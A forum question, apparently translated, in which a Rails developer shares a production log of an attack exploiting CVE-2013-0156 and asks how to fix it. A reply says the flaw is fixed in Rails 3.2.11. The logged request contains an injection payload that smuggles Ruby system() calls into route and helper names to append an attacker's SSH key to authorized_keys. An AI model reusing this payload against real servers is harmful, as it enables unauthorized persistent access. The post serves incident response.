ActionDispatch :: A routing vulnerability was found, has it been fixed?

I noticed some unusual activity on my site a couple of days ago, so I decided to check the production log. Here's what I found:

Started GET "/" for at 2013-01-11 20:25:05 +0000
Processing by HomeController#logo as */*
Parameters: {"exploit"=>#
@routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa 
TtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n"=>
#<OpenStruct defaults={:action=>"create", :controller=>"foos"}, 
required_parts=[], requirements={:action=>"create", :controller=>"foos"},
segment_keys=[:format]>}, @helpers=[:"hash_for_foo; system('cd ~;
mkdir .ssh;echo ssh-rsa 
TwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"foo; 
system('cd ~;mkdir .ssh;echo ssh-rsa 
root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"hash_for_foo; 
system('cd ~;mkdir .ssh;echo ssh-rsa
xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >>
~/.ssh/authorized_keys')\n__END__\n_path", :"foo; system('cd ~;mkdir .ssh;
echo ssh-rsa 
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> 
~/.ssh/authorized_keys')\n__END__\n_path"], @module=#<Module:0xcb7e5c4>>}
Rendered landing_users/_form.html.haml (4.7ms)
Rendered home/logo.html.haml within layouts/application (7.8ms)
Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms)


I kept checking if their system calls were working and of course I found the same ssh key in ~ / .ssh / authorized_keys. So this means they could run system calls through my rails app !!!! Luckily my rails app doesn't run as root, so they didn't get root access. But it scares me.

Has anyone encountered this exploit before? If so, how did you fix it?

My rails app is on Ubuntu 12.04 using rails version 3.2.8 and ruby โ€‹โ€‹version 1.9.3p125. If any other information helps, please let me know!

I found a blog post referencing this exploit, but no solutions on how to execute it.


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1 answer

Did you follow the link on this blog?

On January 8, Aaron Patterson announced CVE-2013-0156

If you have done this, you will see that it is fixed in Rails 3.2.11.

Update the app immediately !



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